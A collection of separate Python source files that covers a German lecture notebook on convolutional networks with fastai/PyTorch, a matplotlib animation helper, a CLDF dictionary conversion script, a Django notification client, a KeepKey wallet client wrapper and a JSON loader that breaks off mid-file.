# <h2 style="text-align:center;">Dr. Matthias Hölzl</h2>
# %% [markdown] slideshow={"slide_type": "subslide"}
# # Darstellung von Bildern
#
# <img src="img/ag/Figure-21-001.png" style="width: 70%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# # Filter für gelbe Pixel
# <img src="img/ag/Figure-21-002.png" style="width: 70%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# ## Funktionsweise des Gelbfilters
# <img src="img/ag/Figure-21-003.png" style="width: 40%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# ## "Ausstanzen" der Werte
# <img src="img/ag/Figure-21-004.png" style="width: 40%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# ## Verschieben des Filters
# <img src="img/ag/Figure-21-005.png" style="width: 50%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# ## Beispiel
# <img src="img/ag/Figure-21-006.png" style="width: 70%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "slide"}
# ## Parallele Verarbeitung
# <img src="img/ag/Figure-21-007.png" style="width: 70%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "slide"}
# ## Konvolution
#
# <img src="img/ag/Figure-21-008.png" style="width: 40%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# ## Konvolution: Anker
#
# <img src="img/ag/Figure-21-009.png" style="width: 70%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# ## Konvolution: Funktionsweise
# <img src="img/ag/Figure-21-010.png" style="width: 50%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# ## Input und Gewichte haben die gleiche Größe
# <img src="img/ag/Figure-21-011.png" style="width: 50%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "slide"}
# ## Verschieben des Filters
# <img src="img/ag/Figure-21-013.png" style="width: 40%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "slide"}
# ## Beispiel
#
# <img src="img/ag/Figure-21-014.png" style="width: 70%; margin-left: auto; margin-right: auto;"/>
#
# <br/>
# <div style="display: block; width: 30%; float: left">
# <ul>
# <li> Rote Felder: -1</li>
# <li>Gelbe Felder: 1</li>
# <li>Schwarze Felder: 0</li>
# <li>Weiße Felder: 1</li>
# </ul>
# </div>
#
# <div style="display: block; width: 50%; float: left;">
# <ul>
# <li>Minimalwert: -6</li>
# <li>Maximalwert: 3</li>
# </ul>
# </div>
# %% [markdown] slideshow={"slide_type": "subslide"}
# <img src="img/ag/Figure-21-015.png" style="width: 70%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# <img src="img/ag/Figure-21-016.png" style="width: 70%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "slide"}
# ## Andere Betrachtungsweise: Zerschneiden von Bildern
# <img src="img/ag/Figure-21-017.png" style="width: 30%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "slide"}
# ## Hierarchische Features
# <img src="img/ag/Figure-21-018.png" style="width: 70%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# <img src="img/ag/Figure-21-019.png" style="width: 40%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# <img src="img/ag/Figure-21-020.png" style="width: 70%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# <img src="img/ag/Figure-21-021.png" style="width: 50%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# <img src="img/ag/Figure-21-022.png" style="width: 70%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# <img src="img/ag/Figure-21-023.png" style="width: 40%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "slide"}
# # Randwerte
# <img src="img/ag/Figure-21-024.png" style="width: 30%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# <img src="img/ag/Figure-21-025.png" style="width: 35%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# ## Verkleinerung des Resultats
#
# <img src="img/ag/Figure-21-026.png" style="width: 70%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# ## Padding
# <img src="img/ag/Figure-21-027.png" style="width: 35%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "slide"}
# # ConvNet für MNIST
# <img src="img/ag/Figure-21-048.png" style="width: 60%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "slide"}
# ## Performance
# <img src="img/ag/Figure-21-049.png" style="width: 50%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "slide"}
# <img src="img/ag/Figure-21-050.png" style="width: 70%; margin-left: auto; margin-right: auto;"/>
# %% slideshow={"slide_type": "slide"}
from fastai.vision.all import *
import torch
from torch import nn
import torch.nn.functional as F
from torch.utils.data import DataLoader
from torchvision import datasets, transforms
# %%
model = nn.Sequential(
nn.Conv2d(1, 32, 3, 1),
nn.ReLU(),
nn.Conv2d(32, 64, 3, 1),
nn.MaxPool2d(2),
nn.Dropout2d(0.25),
nn.Flatten(1),
nn.Linear(9216, 128),
nn.ReLU(),
nn.Dropout2d(0.5),
nn.Linear(128, 10),
nn.LogSoftmax(dim=1)
)
# %%
transform = transforms.Compose([transforms.ToTensor()])
batch_size = 256
test_batch_size = 512
epochs = 5
learning_rate = 0.001
# %%
train_loader = DataLoader(
datasets.MNIST('../data', train=True, download=True, transform=transform),
batch_size=batch_size, shuffle=True)
test_loader = DataLoader(
datasets.MNIST('../data', train=False, transform=transform),
batch_size=test_batch_size, shuffle=True)
# %%
data = DataLoaders(train_loader, test_loader)
# %%
learn = Learner(data, model, loss_func=F.nll_loss, opt_func=Adam, metrics=accuracy)
# %%
learn.lr_find()
# %%
learn.fit_one_cycle(epochs, learning_rate)
# %% [markdown] slideshow={"slide_type": "slide"}
# # Stride 1
# <img src="img/ag/Figure-21-028.png" style="width: 40%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# ## Stride 3 $\times$ 2
# <img src="img/ag/Figure-21-029.png" style="width: 20%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# ## Stride 3 $\times$ 2
# <img src="img/ag/Figure-21-030.png" style="width: 50%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# ## Gleichförmige Strides: 2, 3
# <img src="img/ag/Figure-21-031.png" style="width: 50%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# ## Stride = Filtergröße
# <img src="img/ag/Figure-21-032.png" style="width: 50%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# ## Farbbilder: Mehrere Layer
# <img src="img/ag/Figure-21-033.png" style="width: 40%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# <img src="img/ag/Figure-21-034.png" style="width: 40%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# <img src="img/ag/Figure-21-035.png" style="width: 40%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "slide"}
# ## Stacks von Konvolutionen
# <img src="img/ag/Figure-21-036.png" style="width: 70%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# <img src="img/ag/Figure-21-037.png" style="width: 70%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# <img src="img/ag/Figure-21-038.png" style="width: 70%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "slide"}
# # 1D-Konvolution
# <img src="img/ag/Figure-21-039.png" style="width: 70%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "slide"}
# # 1$\times$1-Konvolution
# <img src="img/ag/Figure-21-040.png" style="width: 70%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "slide"}
# # 1$\times$1-Konvolution: Dimensionsreduktion
# <img src="img/ag/Figure-21-041.png" style="width: 70%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "slide"}
# # Padding und Upsampling (Fractional Convolution)
#
# <img src="img/ag/Figure-21-042.png" style="width: 70%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "slide"}
# ## Kein Padding
# <img src="img/ag/Figure-21-043.png" style="width: 40%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# ## 1 Pixel Padding
# <img src="img/ag/Figure-21-044.png" style="width: 30%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# ## 2 Pixel Padding
# <img src="img/ag/Figure-21-045.png" style="width: 35%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# ## Upsampling durch Konvolution
# <img src="img/ag/Figure-21-046.png" style="width: 35%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# <img src="img/ag/Figure-21-047.png" style="width: 35%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "slide"}
# # VGG 16
# <img src="img/ag/Figure-21-051.png" style="width: 70%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "slide"}
# <img src="img/ag/Figure-21-052.png" style="width: 70%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "slide"}
# <img src="img/ag/Figure-21-053.png" style="width: 70%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# <img src="img/ag/Figure-21-054.png" style="width: 70%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# <img src="img/ag/Figure-21-055.png" style="width: 70%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# <img src="img/ag/Figure-21-056.png" style="width: 70%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# ## Beispiel-Klassifizierung
# <img src="img/ag/Figure-21-057.png" style="width: 40%; margin-left: auto; margin-right: auto;"/>
# %% [markdown]
# # Klassifizierung von Bildern mit VGG16
# %%
path = untar_data(URLs.DOGS)
# %%
path.ls()
# %%
files = get_image_files(path/'images')
len(files)
# %%
files[0]
# %%
def label_func(f):
return f[0].isupper()
# %%
dls = ImageDataLoaders.from_name_func(path, files, label_func, item_tfms=Resize(224))
# %%
dls.show_batch()
# %%
learn = cnn_learner(dls, vgg16_bn, metrics=error_rate)
learn.fine_tune(1)
# %%
learn.predict(files[0]), files[0]
# %%
learn.show_results()
# %% [markdown] slideshow={"slide_type": "slide"}
# ## Visualisierung von VGG16 (Gradient Ascent)
# <img src="img/ag/Figure-21-058.png" style="width: 35%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "slide"}
# <img src="img/ag/Figure-21-059.png" style="width: 35%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "slide"}
# <img src="img/ag/Figure-21-060.png" style="width: 35%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "slide"}
# <img src="img/ag/Figure-21-061.png" style="width: 35%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "slide"}
# <img src="img/ag/Figure-21-062.png" style="width: 35%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "slide"}
# # Visualisierung (Effekt einzelner Layer)
# <img src="img/ag/Figure-21-063.png" style="width: 35%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# <img src="img/ag/Figure-21-064.png" style="width: 35%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# <img src="img/ag/Figure-21-065.png" style="width: 70%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# <img src="img/ag/Figure-21-066.png" style="width: 70%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# <img src="img/ag/Figure-21-067.png" style="width: 70%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "slide"}
# <img src="img/ag/Figure-21-068.png" style="width: 70%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "slide"}
# # Adverserial Examples
# <img src="img/ag/Figure-21-069.png" style="width: 50%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# <img src="img/ag/Figure-21-070.png" style="width: 50%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# <img src="img/ag/Figure-21-071.png" style="width: 50%; margin-left: auto; margin-right: auto;"/>
# %%
|
python
|
import matplotlib.pyplot as plt
import matplotlib.animation as animation
def ani_easy(tas, cmap='BrBG'):
# Get a handle on the figure and the axes
fig, ax = plt.subplots(figsize=(12,6))
# Plot the initial frame.
cax = tas[0,:,:].plot(
add_colorbar=True,
cmap=cmap,
#cmap='BrBG',
#cmap='magma',
# vmin=-40, vmax=40,
cbar_kwargs={
'extend':'neither'
}
)
num_frames = tas.shape[0]
# Next we need to create a function that updates the values for the colormesh, as well as the title.
def animate(frame):
cax.set_array(tas[frame,:,:].values.flatten())
ax.set_title("Time = " + str(tas.coords['time'].values[frame])[:13])
# Finally, we use the animation module to create the animation.
ani = animation.FuncAnimation(
fig, # figure
animate, # name of the function above
frames=num_frames, # Could also be iterable or list
interval=200 # ms between frames
)
return ani
|
python
|
from collections import ChainMap, defaultdict
from itertools import chain
import pathlib
import re
from cldfbench import Dataset as BaseDataset, CLDFSpec
from pybtex.database import parse_string
from pydictionaria.sfm_lib import Database as SFM
from pydictionaria.preprocess_lib import marker_fallback_sense, merge_markers
from pydictionaria import sfm2cldf
CROSSREF_BLACKLIST = {'xv', 'lg'}
CROSSREF_MARKERS = {'cf', 'mn', 'sy', 'an', 'cont', 'lv'}
def _unhtml(pair):
marker, value = pair
if marker == 'mr':
return marker, re.sub(r'<compo>([^<]+)</compo>', r'|fv{\1}', value)
else:
return pair
def unhtml_mr(entry):
if entry.get('mr'):
return entry.__class__(map(_unhtml, entry))
else:
return entry
def prepreprocess(entry):
entry = unhtml_mr(entry)
return entry
class MySFM(SFM):
def __init__(self, entries):
self.extend(entries)
class EntrySplitter:
def __init__(self):
self._homonyms = defaultdict(int)
self.id_map = {}
self.la_index = {}
def _split_groups(self, entry):
groups = [entry.__class__()]
for marker, value in entry:
if marker == 'gp':
groups.append(entry.__class__())
groups[-1].append((marker, value))
return groups[0], groups[1:]
def _split_senses(self, entry):
if not entry:
return []
senses = [entry.__class__()]
for marker, value in entry:
if marker == 'sn':
senses.append(entry.__class__())
senses[-1].append((marker, value))
return senses
def _extract_subentries(self, entry):
main_entry = entry.__class__()
subentries = []
senses = self._split_senses(entry)
for sense in senses:
sense_subentries = []
for marker, value in sense:
if marker == 'se':
sense_subentries.append(entry.__class__())
if sense_subentries:
sense_subentries[-1].append((marker, value))
else:
main_entry.append((marker, value))
subentries.extend(sense_subentries)
return main_entry, subentries
def _generate_subentry(self, subentry, parent_id, ps):
lx = subentry.get('se')
hm = subentry.get('hm') or ''
old_id = '{}_{}'.format(lx, hm) if hm else lx
self._homonyms[lx] += 1
new_hm = str(self._homonyms[lx])
new_id = '{}{}'.format(lx, new_hm)
self.id_map[old_id] = new_id
new_entry = subentry.__class__()
new_entry.append(('lx', lx))
new_entry.append(('hm', new_hm))
new_entry.append(('cont', parent_id))
# Some subentries override the part of speech of the entry
if ps and not subentry.get('ps'):
new_entry.append(('ps', ps))
new_entry.extend((m, v) for m, v in subentry if m not in ('se', 'hm'))
return new_entry
def split_entry(self, entry):
lx = entry.get('lx')
la = entry.get('la')
hm = entry.get('hm') or ''
citation_form = la or lx
old_id = '{}_{}'.format(citation_form, hm) if hm else citation_form
ps = entry.get('ps')
main_entry, groups = self._split_groups(entry)
if groups:
new_entries = []
subentries = []
for group in groups:
group_entries = self._split_groups(group)
gp = group.get('gp') or ''
old_gid = '{}.{}'.format(old_id, gp) if gp else old_id
self._homonyms[lx] += 1
new_hm = str(self._homonyms[lx])
new_id = '{}{}'.format(lx, new_hm)
self.id_map[old_gid] = new_id
if la:
if la not in self.la_index:
self.la_index[la] = new_id
la_gid = '{}.{}'.format(la, gp) if gp else la
if la_gid not in self.la_index:
self.la_index[la_gid] = new_id
group_entry, group_subentries = self._extract_subentries(group)
group_ps = group_entry.get('ps')
new_entry = entry.__class__(
(m, v) for m, v in main_entry if m not in ('hm', 'ps'))
new_entry.append(('hm', new_hm))
# Some groups override the part of speech of the entry
if ps and not group_ps:
new_entry.append(('ps', ps))
new_entry.extend(
(m, v) for m, v in group_entry if m != 'gp')
new_entries.append(new_entry)
subentries.extend(
self._generate_subentry(subentry, old_gid, group_ps or ps)
for subentry in group_subentries)
if len(new_entries) > 1:
for entry in new_entries:
heterosemes = [
'{}{}'.format(e.get('lx'), e.get('hm'))
for e in new_entries
if e is not entry]
entry.append(('heterosemes', ' ; '.join(heterosemes)))
for e in new_entries:
yield e
for e in subentries:
yield e
else:
main_entry, subentries = self._extract_subentries(main_entry)
self._homonyms[lx] += 1
new_hm = str(self._homonyms[lx])
new_id = '{}{}'.format(lx, new_hm)
self.id_map[old_id] = new_id
if la and la not in self.la_index:
self.la_index[la] = new_id
new_entry = entry.__class__(
(m, v) for m, v in main_entry if m != 'hm')
new_entry.insert(1, ('hm', new_hm))
yield new_entry
for subentry in subentries:
yield self._generate_subentry(subentry, old_id, ps)
def _fix_single_ref(ref, id_map):
# Shave off sense numbers
ref = re.sub(r'–\d+$', '', ref.strip())
return (
id_map.get(ref)
or id_map.get('{}_1'.format(ref))
or id_map.get('{}.A'.format(ref))
or id_map.get('{}_1.A'.format(ref))
or ref)
def _fix_crossref_field(value, id_map):
return ';'.join(_fix_single_ref(v, id_map) for v in value.split(';'))
def fix_crossrefs(entry, id_map):
def fix_inline_crossref(match):
new_link = _fix_crossref_field(
'{}{}'.format(match.group(2), match.group(3) or ''),
id_map)
return '|{}{{{}}}'.format(match.group(1), new_link)
new_entry = entry.__class__()
for marker, value in entry:
if marker in CROSSREF_MARKERS:
value = _fix_crossref_field(value, id_map)
elif marker not in CROSSREF_BLACKLIST:
value = re.sub(
r'\|(fv|vl)\{([^}]+)\}(?:\|hm\{(\d+)\})?',
fix_inline_crossref,
value)
new_entry.append((marker, value))
return new_entry
def reorganize(sfm):
"""Use this function if you need to manually add or remove entrys from the
SFM data.
Takes an SFM database as an argument and returns a modified SFM database.
"""
splitter = EntrySplitter()
sfm = MySFM(
new_entry
for old_entry in sfm
for new_entry in splitter.split_entry(old_entry))
sfm.visit(lambda e: fix_crossrefs(e, ChainMap(splitter.id_map, splitter.la_index)))
return sfm
def _convert_before_sn(mapping, entry):
found_sn = False
for m, v in entry:
if found_sn:
yield m, v
elif m == 'sn':
found_sn = True
yield m, v
else:
yield mapping.get(m, m), v
def convert_before_sn(mapping, entry):
if entry.get('sn'):
return entry.__class__(_convert_before_sn(mapping, entry))
else:
return entry
def remove_markers(markers, entry):
return entry.__class__(
(m, v)
for m, v in entry
if m not in markers)
def move_images_into_sense(entry):
"""Sometimes there are \pc tags in the entry -- move those to the first sense."""
if not entry.get('sn') or not entry.get('pc'):
return entry
new_entry = entry.__class__()
found_sn = None
images = []
for m, v in entry:
if found_sn:
new_entry.append((m, v))
elif m == 'pc':
images.append([v])
elif m == 'lg':
images[-1].append(v)
elif m == 'sn':
# jump out early if the entry did not contain any pictures
if not images:
return entry
found_sn = True
new_entry.append((m, v))
for image in images:
new_entry.append(('pc', image[0]))
for lg in image[1:]:
new_entry.append(('lg', lg))
else:
new_entry.append((m, v))
return new_entry
def _box_markers(box):
if 'conf' in box:
conf = '{}: {}'.format(box['tie'], box['conf']) if 'tie' in box else box['conf']
yield 'conf', conf
if 'cona' in box:
cona = '{}: {}'.format(box['tin'], box['cona']) if 'tin' in box else box['cona']
yield 'cona', cona
if 'conv' in box:
conv = '{}: {}'.format(box['tiv'], box['conv']) if 'tiv' in box else box['conv']
yield 'conv', conv
def merge_infobox_titles(entry):
box_markers = {'enc', 'tie', 'tin', 'tiv', 'conv', 'conf', 'cona'}
box = {}
new_entry = entry.__class__()
for marker, value in entry:
if marker == 'enc':
box['enc'] = value
elif box:
if marker in box_markers:
box[marker] = value
else:
new_entry.extend(_box_markers(box))
box = {}
new_entry.append((marker, value))
else:
new_entry.append((marker, value))
if box:
new_entry.extend(_box_markers(box))
return new_entry
def merge_etymology(marker_dict):
return '{el}{sep1}{et}{sep2}{eg}'.format(
el=marker_dict.get('el') or '',
sep1=': ' if marker_dict.get('el') and len(marker_dict) > 1 else '',
et=marker_dict.get('et'),
sep2=' ' if marker_dict.get('el') and marker_dict.get('eg') else '',
eg="'{}'".format(marker_dict.get('eg')) if marker_dict.get('eg') else '')
def generate_link_label(entry):
link_label = entry.get('la') or entry.get('lx') or ''
new_entry = entry.__class__(entry)
new_entry.insert(1, ('link_label', link_label))
return new_entry
def preprocess(entry):
"""Use this function if you need to change the contents of an entry before
any other processing.
This is run on every entry in the SFM database.
"""
entry = remove_markers(('dnu',), entry)
entry = move_images_into_sense(entry)
entry = marker_fallback_sense(entry, 'de', 'gn')
entry = marker_fallback_sense(entry, 'gxx', 'ge')
entry = marker_fallback_sense(entry, 'gxy', 'gr')
entry = merge_infobox_titles(entry)
entry = merge_markers(entry, ['ue', 'ee'], 'ee')
entry = merge_markers(entry, ['un', 'en'], 'en')
entry = merge_markers(entry, ['pdl', 'pdv'], 'pdv')
entry = merge_markers(entry, ['el', 'et', 'eg'], 'et', format_fn=merge_etymology)
entry = generate_link_label(entry)
return entry
def _remove_inline_markers(val):
if isinstance(val, str):
return re.sub(r'\|\w+\{([^}]+)\}', r'\1', val)
else:
return val
def _warn_about_table(table_name, table, columns, link_regex, cldf_log):
if not columns:
return
for row in table:
row_id = row.get('ID')
for colname, value in row.items():
if colname not in columns:
continue
for link_match in re.finditer(link_regex, value):
link = link_match.group(0)
if re.fullmatch(r'\s*\[.*\]\s*\(.*\)\s*', link):
continue
msg = '{}:{}:{}:unknown in-line cross reference `{}`'.format(
table_name, row.get('ID'), colname, link)
cldf_log.warn(msg)
def warn_about_inline_references(
entries, senses, examples, props, cldf_log
):
props = sfm2cldf._add_property_fallbacks(props)
if not props.get('link_regex') or not props.get('process_links_in_markers'):
return
_warn_about_table(
'EntryTable',
entries,
{
props['entry_map'][m]
for m in props['process_links_in_markers']
if m in props['entry_map']
},
props['link_regex'],
cldf_log)
_warn_about_table(
'SenseTable',
senses,
{
props['sense_map'][m]
for m in props['process_links_in_markers']
if m in props['sense_map']
},
props['link_regex'],
cldf_log)
_warn_about_table(
'ExampleTable',
examples,
{
props['example_map'][m]
for m in props['process_links_in_markers']
if m in props['example_map']
},
props['link_regex'],
cldf_log)
def remove_inline_markers(val):
if isinstance(val, list):
return [_remove_inline_markers(v) for v in val]
else:
return _remove_inline_markers(val)
def clean_table(table):
return [
{k: remove_inline_markers(v) for k, v in row.items()}
for row in table]
def authors_string(authors):
"""Return formatted string of all authors."""
def is_primary(a):
return not isinstance(a, dict) or a.get('primary', True)
primary = ' and '.join(
a['name'] if isinstance(a, dict) else a
for a in authors
if is_primary(a))
secondary = ' and '.join(
a['name']
for a in authors
if not is_primary(a))
if primary and secondary:
return '{} with {}'.format(primary, secondary)
else:
return primary or secondary
class Dataset(BaseDataset):
dir = pathlib.Path(__file__).parent
id = "teanu"
def cldf_specs(self): # A dataset must declare all CLDF sets it creates.
return CLDFSpec(
dir=self.cldf_dir,
module='Dictionary',
metadata_fname='cldf-metadata.json')
def cmd_download(self, args):
"""
Download files to the raw/ directory. You can use helpers methods of `self.raw_dir`, e.g.
>>> self.raw_dir.download(url, fname)
"""
pass
def cmd_makecldf(self, args):
"""
Convert the raw data to a CLDF dataset.
>>> args.writer.objects['LanguageTable'].append(...)
"""
# read data
md = self.etc_dir.read_json('md.json')
properties = md.get('properties') or {}
language_name = md['language']['name']
isocode = md['language']['isocode']
language_id = md['language']['isocode']
glottocode = md['language']['glottocode']
marker_map = ChainMap(
properties.get('marker_map') or {},
sfm2cldf.DEFAULT_MARKER_MAP)
entry_sep = properties.get('entry_sep') or sfm2cldf.DEFAULT_ENTRY_SEP
sfm = SFM(
self.raw_dir / 'db.sfm',
marker_map=marker_map,
entry_sep=entry_sep)
examples = sfm2cldf.load_examples(self.raw_dir / 'examples.sfm')
if (self.raw_dir / 'sources.bib').exists():
sources = parse_string(self.raw_dir.read('sources.bib'), 'bibtex')
else:
sources = None
if (self.etc_dir / 'cdstar.json').exists():
media_catalog = self.etc_dir.read_json('cdstar.json')
else:
media_catalog = {}
# preprocessing
sfm.visit(prepreprocess)
sfm = reorganize(sfm)
sfm.visit(preprocess)
# processing
with open(self.dir / 'cldf.log', 'w', encoding='utf-8') as log_file:
log_name = '%s.cldf' % language_id
cldf_log = sfm2cldf.make_log(log_name, log_file)
entries, senses, examples, media = sfm2cldf.process_dataset(
self.id, language_id, properties,
sfm, examples, media_catalog=media_catalog,
glosses_path=self.raw_dir / 'glosses.flextext',
examples_log_path=self.dir / 'examples.log',
glosses_log_path=self.dir / 'glosses.log',
cldf_log=cldf_log)
# Note: If you want to manipulate the generated CLDF tables before
# writing them to disk, this would be a good place to do it.
warn_about_inline_references(
entries, senses, examples, properties, cldf_log)
entries = clean_table(entries)
senses = clean_table(senses)
examples = clean_table(examples)
media = clean_table(media)
# cldf schema
sfm2cldf.make_cldf_schema(
args.writer.cldf, properties,
entries, senses, examples, media)
sfm2cldf.attach_column_titles(args.writer.cldf, properties)
print(file=log_file)
entries = sfm2cldf.ensure_required_columns(
args.writer.cldf, 'EntryTable', entries, cldf_log)
senses = sfm2cldf.ensure_required_columns(
args.writer.cldf, 'SenseTable', senses, cldf_log)
examples = sfm2cldf.ensure_required_columns(
args.writer.cldf, 'ExampleTable', examples, cldf_log)
media = sfm2cldf.ensure_required_columns(
args.writer.cldf, 'media.csv', media, cldf_log)
entries = sfm2cldf.remove_senseless_entries(
senses, entries, cldf_log)
# output
if sources:
args.writer.cldf.add_sources(sources)
args.writer.cldf.properties['dc:creator'] = authors_string(
md.get('authors') or ())
language = {
'ID': language_id,
'Name': language_name,
'ISO639P3code': isocode,
'Glottocode': glottocode,
}
args.writer.objects['LanguageTable'] = [language]
args.writer.objects['EntryTable'] = entries
args.writer.objects['SenseTable'] = senses
args.writer.objects['ExampleTable'] = examples
args.writer.objects['media.csv'] = media
|
python
|
import requests
from django.conf import settings
DEBUG = getattr(settings, 'DEBUG')
class AppleService(object):
def __init__(self, base_url):
self.base_url = base_url
def notify_all(self, resources, message):
for resource in resources:
data = '{"resource": "' + resource + '", "message": "' + message + '"}'
self._send("/notification/all", data)
def notify_user(self, user, resources, message):
for resource in resources:
data = '{"owner": "' + user + '", "resource": "' + resource + '", "message": "' + message + '"}'
self._send("/notification", data)
def notify_users(self, users, resources, message):
for user in users:
self.notify_user(user, resources, message)
def notify_end_users(self, users, resources, message):
if users:
self.notify_users(users, resources, message)
else:
self.notify_all(resources, message)
def _send(self, relative_url, data):
url = self.base_url + relative_url
r = requests.put(url, data)
if DEBUG:
f = open('log.html', 'w')
f.write(r.text)
f.close()
def get_registered_users(self):
url = self.base_url + "/pii/registeredusers"
r = requests.get(url)
if r.status_code != requests.codes.ok:
return
dictionary = r.json()
return dictionary.get("owners")
|
python
|
from keepkeylib.client import proto, BaseClient, ProtocolMixin
from ..trezor.clientbase import TrezorClientBase
class KeepKeyClient(TrezorClientBase, ProtocolMixin, BaseClient):
def __init__(self, transport, handler, plugin):
BaseClient.__init__(self, transport)
ProtocolMixin.__init__(self, transport)
TrezorClientBase.__init__(self, handler, plugin, proto)
def recovery_device(self, *args):
ProtocolMixin.recovery_device(self, False, *args)
TrezorClientBase.wrap_methods(KeepKeyClient)
|
python
|
userInput = ('12')
userInput = int(userInput)
print(userInput)
|
python
|
import json
import os
from typing import Any, Dict, List, Union
here = os.path.abspath(os.path.dirname(__file__))
def _load_list(paths: List[str]) -> dict:
content: Dict[str, Any] = {}
for p in paths:
with open(p) as h:
t = json.load(h)
content.update(t)
return content
def load_json(path_or_dir: Union[str, List[str]]) -> dict:
path_error = (
"replacy.db.load_json expects a valid path to a json file, "
"a list of (valid) paths to json files, "
"or the (valid) path to a directory with json files"
f", but received {path_or_dir}"
)
if type(path_or_dir) == str:
json_path = str(path_or_dir) # make mypy happy
if (
os.path.exists(json_path)
and os.path.isfile(json_path)
and json_path[-5:] == ".json"
):
with open(json_path) as h:
content = json.load(h)
elif os.path.isdir(json_path):
paths = [
os.path.join(json_path, f)
for f in os.listdir(json_path)
if f.endswith(".json")
]
content = _load_list(paths)
else:
raise ValueError(path_error)
elif type(path_or_dir) == list:
paths = list(path_or_dir) # for mypy
content = _load_list(paths)
else:
raise TypeError(path_error)
return content
def get_forms_lookup(forms_path="resources/forms_lookup.json"):
